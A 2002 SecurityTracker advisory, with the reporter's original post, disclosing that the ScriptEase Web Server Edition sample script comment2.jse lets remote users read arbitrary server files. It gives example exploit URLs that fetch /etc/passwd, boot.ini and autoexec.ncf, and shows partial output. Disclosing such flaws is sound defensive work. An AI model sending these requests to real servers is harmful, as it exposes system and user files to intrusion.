SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker -- bugs@securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Server/CGI)  >  ScriptEase Web Server Edition Vendors:  Nombas, Inc.
ScriptEase Web Server Edition Sample Script (comment2.jse) Discloses Files Located Anywhere on the Server to Remote Users
Date:  Feb 25 2002
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A file disclosure vulnerability was reported in the Nombas ScriptEase Web Server Edition. A remote user can view files located anywhere on the server.

It is reported that a remote user can exploit the 'comment2.jse' sample script to view files located anywhere on the server. The following type of URLs will reportedly trigger the flaw:

http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf


http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini

http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jab ber/comment2.jse+/etc/passwd
Impact:  A remote user can view files located anywhere on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nombas.com/us/download/ndownload.htm (Links to External Site)
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Aleksander Posmyk" <blah@omi.pl>
Message History:   None.

 Source Message Contents
Date:  Sun, 24 Feb 2002 11:47:14 +0100
From:  "Aleksander Posmyk" <blah@omi.pl>
Subject:  ScriptEase:WebServer Edition vulnerability

 

Program: ScriptEase:WebServer Edition
Url: www.nombas.com
Problem: Any user can read files on server using one of examle scripts: comment2.jse
Systems affected: Linux, Novell Netware, Windows 9x/NT/2k

Example:
WindowsNovell Netware:
http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoex
ec.ncf
SET CLIENT FILE ...:
http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\b
oot.ini
[boot loader] timeout=10 ...



Linux:
http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
root:....

I found this in a default instalation of Novell Netware 5.1...
Sorry for my english.
________________________________
Aleksander Posmyk - blah@lucyfer.omi.pl


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC